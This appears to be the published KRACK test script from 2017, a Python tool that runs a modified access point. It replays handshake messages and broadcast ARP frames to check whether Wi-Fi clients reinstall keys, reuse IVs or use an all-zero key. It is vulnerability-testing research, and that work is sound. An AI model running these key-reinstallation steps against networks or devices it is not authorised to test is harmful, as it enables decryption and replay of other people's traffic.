krack-test-client.py 20 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. from libwifi import *
  11. import sys, socket, struct, time, subprocess, atexit, select, os.path
  12. from wpaspy import Ctrl
  13. # FIXME:
  14. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  15. # - We should test decryption using an all-zero key, and warn if this seems to succeed
  16. # Future work:
  17. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  18. # - Ability to test the group key handshake against specific clients only
  19. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  20. # After how many seconds a new message 3, or new group key message 1, is sent.
  21. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  22. HANDSHAKE_TRANSMIT_INTERVAL = 2
  23. #### Utility Commands ####
  24. def hostapd_command(hostapd_ctrl, cmd):
  25. rval = hostapd_ctrl.request(cmd)
  26. if "UNKNOWN COMMAND" in rval:
  27. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  28. quit(1)
  29. return rval
  30. #### Main Testing Code ####
  31. class ClientState():
  32. UNKNOWN, VULNERABLE, PATCHED = range(3)
  33. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  34. def __init__(self, clientmac, test_group_hs=False, test_tptk=False):
  35. self.mac = clientmac
  36. self.TK = None
  37. self.vuln_4way = ClientState.UNKNOWN
  38. self.vuln_group = ClientState.UNKNOWN
  39. # FIXME: Separate variable for group handshake result?
  40. self.ivs = IvCollection()
  41. self.pairkey_sent_time_prev_iv = None
  42. self.pairkey_intervals_no_iv_reuse = 0
  43. self.pairkey_tptk = test_tptk
  44. self.groupkey_reset()
  45. self.groupkey_grouphs = test_group_hs
  46. def groupkey_reset(self):
  47. self.groupkey_state = ClientState.IDLE
  48. self.groupkey_prev_canary_time = 0
  49. self.groupkey_num_canaries = 0
  50. self.groupkey_requests_sent = 0
  51. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  52. def start_grouphs_test():
  53. self.groupkey_reset()
  54. self.groupkey_grouphs = True
  55. # TODO: Put in libwifi?
  56. def get_encryption_key(self, hostapd_ctrl):
  57. if self.TK is None:
  58. # Clear old replies and messages from the hostapd control interface
  59. while hostapd_ctrl.pending():
  60. hostapd_ctrl.recv()
  61. # Contact our modified Hostapd instance to request the pairwise key
  62. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  63. if not "FAIL" in response:
  64. self.TK = response.strip().decode("hex")
  65. return self.TK
  66. # TODO: Put in libwifi?
  67. def decrypt(self, p, hostapd_ctrl):
  68. payload = get_ccmp_payload(p)
  69. llcsnap, packet = payload[:8], payload[8:]
  70. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  71. # On some kernels, the virtual interface associated to the real AP interface will return
  72. # frames where the payload is already decrypted (this happens when hardware decryption is
  73. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  74. plaintext = payload
  75. else:
  76. key = self.get_encryption_key(hostapd_ctrl)
  77. plaintext = decrypt_ccmp(p, key)
  78. # If it still fails, try an all-zero key
  79. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  80. plaintext = decrypt_ccmp(p, "\x00" * 16)
  81. return plaintext
  82. def track_used_iv(self, p):
  83. return self.ivs.track_used_iv(p)
  84. def is_iv_reused(self, p):
  85. return self.ivs.is_iv_reused(p)
  86. def check_pairwise_reinstall(self, p):
  87. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  88. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  89. if self.ivs.is_iv_reused(p):
  90. if self.vuln_4way != ClientState.VULNERABLE:
  91. iv = dot11_get_iv(p)
  92. seq = dot11_get_seqnum(p)
  93. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  94. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  95. self.vuln_4way = ClientState.VULNERABLE
  96. # If it's a higher IV than all previous ones, try to check if the client seems patched
  97. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  98. # Save how many intervals we received a data packet without IV reset. Use twice the
  99. # transmission interval of message 3, in case one message 3 is lost due to noise.
  100. if self.pairkey_sent_time_prev_iv is None:
  101. self.pairkey_sent_time_prev_iv = p.time
  102. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  103. self.pairkey_intervals_no_iv_reuse += 1
  104. self.pairkey_sent_time_prev_iv = p.time
  105. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  106. # If during several intervals all IV reset attempts failed, the client is likely patched.
  107. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  108. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  109. self.vuln_4way = ClientState.PATCHED
  110. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  111. msg = "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake"
  112. if self.pairkey_tptk == KRAckAttackClient.TPTK_NONE:
  113. msg += " (using standard attack)"
  114. elif self.pairkey_tptk == KRAckAttackClient.TPTK_REPLAY:
  115. msg += " (using TPTK attack)"
  116. elif self.pairkey_tptk == KRAckAttackClient.TPTK_RAND:
  117. msg += " (using TPTK-RAND attack)"
  118. log(INFO, (msg + ".") % self.mac, color="green")
  119. def mark_allzero_key(self, p):
  120. if self.vuln_4way != ClientState.VULNERABLE:
  121. iv = dot11_get_iv(p)
  122. seq = dot11_get_seqnum(p)
  123. log(INFO, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  124. "Client is vulnerable to (re)installation of an all-zero key in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  125. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this first !!!" % self.mac)
  126. self.vuln_4way = ClientState.VULNERABLE
  127. def groupkey_handle_canary(self, p):
  128. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  129. # Must be testing this client, and must not be a benign retransmission
  130. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  131. if self.groupkey_prev_canary_time + 1 > p.time: return
  132. self.groupkey_num_canaries += 1
  133. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.groupkey_num_canaries))
  134. # We wait for several replies before marking the client as vulnerable, because
  135. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  136. if self.groupkey_num_canaries >= 5:
  137. assert self.vuln_group != ClientState.VULNERABLE
  138. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  139. % (self.mac, self.groupkey_num_canaries), color="green")
  140. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  141. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  142. self.vuln_group = ClientState.VULNERABLE
  143. self.groupkey_state = ClientState.FINISHED
  144. # Remember that we got a reply this interval (see groupkey_track_request to detect patched clients)
  145. else:
  146. self.groupkey_state = ClientState.GOT_CANARY
  147. self.groupkey_prev_canary_time = p.time
  148. def groupkey_track_request(self):
  149. """Track when we send broadcast ARP requests, and determine if a client seems patched"""
  150. if self.vuln_group != ClientState.UNKNOWN: return
  151. hstype = "group key" if self.groupkey_grouphs else "4-way"
  152. # Show a message when we started with testing the client
  153. if self.groupkey_state == ClientState.IDLE:
  154. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  155. self.groupkey_state = ClientState.STARTED
  156. if self.groupkey_requests_sent == 4:
  157. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  158. if self.groupkey_state == ClientState.GOT_CANARY:
  159. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  160. self.groupkey_state = ClientState.STARTED
  161. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  162. elif self.groupkey_state == ClientState.STARTED:
  163. self.groupkey_patched_intervals += 1
  164. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  165. self.groupkey_state = ClientState.STARTED
  166. self.groupkey_requests_sent = 0
  167. # If the client appears secure for several intervals (see above), it's likely patched
  168. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  169. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  170. self.vuln_group = ClientState.PATCHED
  171. self.groupkey_state = ClientState.FINISHED
  172. self.groupkey_requests_sent += 1
  173. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  174. class KRAckAttackClient():
  175. TPTK_NONE, TPTK_REPLAY, TPTK_RAND = range(3)
  176. def __init__(self):
  177. # Parse hostapd.conf
  178. self.script_path = os.path.dirname(os.path.realpath(__file__))
  179. try:
  180. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  181. except Exception as ex:
  182. log(ERROR, "Failed to parse the hostapd.conf config file")
  183. raise
  184. if not interface:
  185. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  186. quit(1)
  187. # Set other variables
  188. self.nic_iface = interface
  189. self.nic_mon = interface + "mon"
  190. self.test_grouphs = False
  191. self.test_tptk = KRAckAttackClient.TPTK_NONE
  192. try:
  193. self.apmac = scapy.arch.get_if_hwaddr(interface)
  194. except:
  195. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  196. raise
  197. self.sock_mon = None
  198. self.sock_eth = None
  199. self.hostapd = None
  200. self.hostapd_ctrl = None
  201. self.dhcp = None
  202. self.group_ip = None
  203. self.group_arp = None
  204. self.clients = dict()
  205. def reset_client_info(self, clientmac):
  206. if clientmac in self.dhcp.leases:
  207. self.dhcp.remove_client(clientmac)
  208. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  209. if clientmac in self.clients:
  210. del self.clients[clientmac]
  211. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  212. def handle_replay(self, p):
  213. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  214. function processes these frames manually so we can still test reinstallations of the group key."""
  215. if not Dot11WEP in p: return
  216. # Reconstruct Ethernet header
  217. clientmac = p.addr2
  218. header = Ether(dst=self.apmac, src=clientmac)
  219. header.time = p.time
  220. # Decrypt the payload and obtain LLC/SNAP header and packet content
  221. client = self.clients[clientmac]
  222. plaintext = client.decrypt(p, self.hostapd_ctrl)
  223. llcsnap, packet = plaintext[:8], plaintext[8:]
  224. # Rebuild the full Ethernet packet
  225. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  226. decap = header/ARP(packet)
  227. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  228. decap = header/IP(packet)
  229. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  230. decap = header/IPv6(packet)
  231. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  232. # # EAPOL
  233. else:
  234. return
  235. # Now process the packet as if it were a valid (non-replayed) one
  236. self.process_eth_rx(decap)
  237. def handle_mon_rx(self):
  238. p = self.sock_mon.recv()
  239. if p == None: return
  240. if p.type == 1: return
  241. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  242. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  243. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  244. # The first bit in FCfield is set if the frames is "to-DS"
  245. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  246. if apmac != self.apmac: return None
  247. # Reset info about disconnected clients
  248. if Dot11Deauth in p or Dot11Disas in p:
  249. self.reset_client_info(clientmac)
  250. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  251. elif p.addr1 == self.apmac and Dot11WEP in p:
  252. if not clientmac in self.clients:
  253. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs, test_tptk=self.test_tptk)
  254. client = self.clients[clientmac]
  255. iv = dot11_get_iv(p)
  256. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  257. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  258. client.mark_allzero_key(p)
  259. if not self.test_grouphs:
  260. client.check_pairwise_reinstall(p)
  261. if client.is_iv_reused(p):
  262. self.handle_replay(p)
  263. client.track_used_iv(p)
  264. def process_eth_rx(self, p):
  265. self.dhcp.reply(p)
  266. self.group_arp.reply(p)
  267. clientmac = p[Ether].src
  268. if not clientmac in self.clients: return
  269. client = self.clients[clientmac]
  270. if ARP in p and p[ARP].pdst == self.group_ip:
  271. client.groupkey_handle_canary(p)
  272. def handle_eth_rx(self):
  273. p = self.sock_eth.recv()
  274. if p == None or not Ether in p: return
  275. self.process_eth_rx(p)
  276. def configure_interfaces(self):
  277. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  278. # 0. Some users may forget this otherwise
  279. subprocess.check_output(["rfkill", "unblock", "wifi"])
  280. # 1. Remove unused virtual interfaces to start from a clean state
  281. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  282. # 2. Configure monitor mode on interfaces
  283. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  284. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  285. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  286. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  287. time.sleep(0.5)
  288. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  289. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  290. def run(self, test_grouphs=False, test_tptk=False):
  291. self.configure_interfaces()
  292. self.test_tptk = test_tptk
  293. # Open the patched hostapd instance that carries out tests and let it start
  294. log(STATUS, "Starting hostapd ...")
  295. try:
  296. self.hostapd = subprocess.Popen([
  297. os.path.join(self.script_path, "../hostapd/hostapd"),
  298. os.path.join(self.script_path, "hostapd.conf")]
  299. + sys.argv[1:])
  300. except:
  301. if not os.path.exists("../hostapd/hostapd"):
  302. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  303. raise
  304. time.sleep(1)
  305. try:
  306. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  307. self.hostapd_ctrl.attach()
  308. except:
  309. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  310. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  311. raise
  312. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  313. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  314. # Let scapy handle DHCP requests
  315. self.dhcp = DHCP_sock(sock=self.sock_eth,
  316. domain='krackattack.com',
  317. pool=Net('192.168.100.0/24'),
  318. network='192.168.100.0/24',
  319. gw='192.168.100.254',
  320. renewal_time=600, lease_time=3600)
  321. # Configure gateway IP: reply to ARP and ping requests
  322. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  323. # Use a dedicated IP address for our broadcast ARP requests and replies
  324. self.group_ip = self.dhcp.pool.pop()
  325. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  326. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  327. # Monitor both the normal interface and virtual monitor interface of the AP
  328. self.next_arp = time.time() + 1
  329. while True:
  330. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  331. if self.sock_mon in sel[0]: self.handle_mon_rx()
  332. if self.sock_eth in sel[0]: self.handle_eth_rx()
  333. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  334. if time.time() > self.next_arp:
  335. hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
  336. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  337. for client in self.clients.values():
  338. # 1. Test the 4-way handshake. We rely on an encrypted message 4 as reply to detect pairwise
  339. # key reinstallations reinstallations.
  340. if not self.test_grouphs and client.vuln_4way != ClientState.VULNERABLE:
  341. # First inject a message 1 if requested using the TPTK option
  342. if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
  343. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
  344. elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
  345. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
  346. hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac)
  347. # 2. Test reinstallation of the group key (in both the 4-way and group key handshake). Keep
  348. # injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  349. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  350. if self.test_grouphs:
  351. hostapd_command(self.hostapd_ctrl, "RESEND_GROUP_M1 " + client.mac)
  352. clientip = self.dhcp.leases[client.mac]
  353. client.groupkey_track_request()
  354. time.sleep(0.1)
  355. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  356. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  357. self.sock_eth.send(request)
  358. def stop(self):
  359. log(STATUS, "Closing hostapd and cleaning up ...")
  360. if self.hostapd:
  361. self.hostapd.terminate()
  362. self.hostapd.wait()
  363. if self.sock_mon: self.sock_mon.close()
  364. if self.sock_eth: self.sock_eth.close()
  365. def cleanup():
  366. attack.stop()
  367. def argv_get_interface():
  368. for i in range(len(sys.argv)):
  369. if not sys.argv[i].startswith("-i"):
  370. continue
  371. if len(sys.argv[i]) > 2:
  372. return sys.argv[i][2:]
  373. else:
  374. return sys.argv[i + 1]
  375. return None
  376. def argv_pop_argument(argument):
  377. if not argument in sys.argv: return False
  378. idx = sys.argv.index(argument)
  379. del sys.argv[idx]
  380. return True
  381. def hostapd_read_config(config):
  382. # Read the config, get the interface name, and verify some settings.
  383. interface = None
  384. with open(config) as fp:
  385. for line in fp.readlines():
  386. line = line.strip()
  387. if line.startswith("interface="):
  388. interface = line.split('=')[1]
  389. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  390. if "TKIP" in line:
  391. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  392. log(ERROR, " >%s<" % line, showtime=False)
  393. quit(1)
  394. # Parameter -i overrides interface in config.
  395. # FIXME: Display warning when multiple interfaces are used.
  396. if argv_get_interface() is not None:
  397. interface = argv_get_interface()
  398. return interface
  399. if __name__ == "__main__":
  400. if "--help" in sys.argv or "-h" in sys.argv:
  401. print "See README.md for instructions on how to use this script"
  402. quit(1)
  403. test_grouphs = argv_pop_argument("--group")
  404. test_tptk_replay = argv_pop_argument("--tptk")
  405. test_tptk_rand = argv_pop_argument("--tptk-rand")
  406. while argv_pop_argument("--debug"):
  407. global_log_level -= 1
  408. test_tptk = KRAckAttackClient.TPTK_NONE
  409. if test_tptk_replay and test_tptk_rand:
  410. log(ERROR, "Please only specify --tptk or --tptk-rand")
  411. elif test_tptk_replay:
  412. test_tptk = KRAckAttackClient.TPTK_REPLAY
  413. elif test_tptk_rand:
  414. test_tptk = KRAckAttackClient.TPTK_RAND
  415. attack = KRAckAttackClient()
  416. atexit.register(cleanup)
  417. attack.run(test_grouphs=test_grouphs, test_tptk=test_tptk)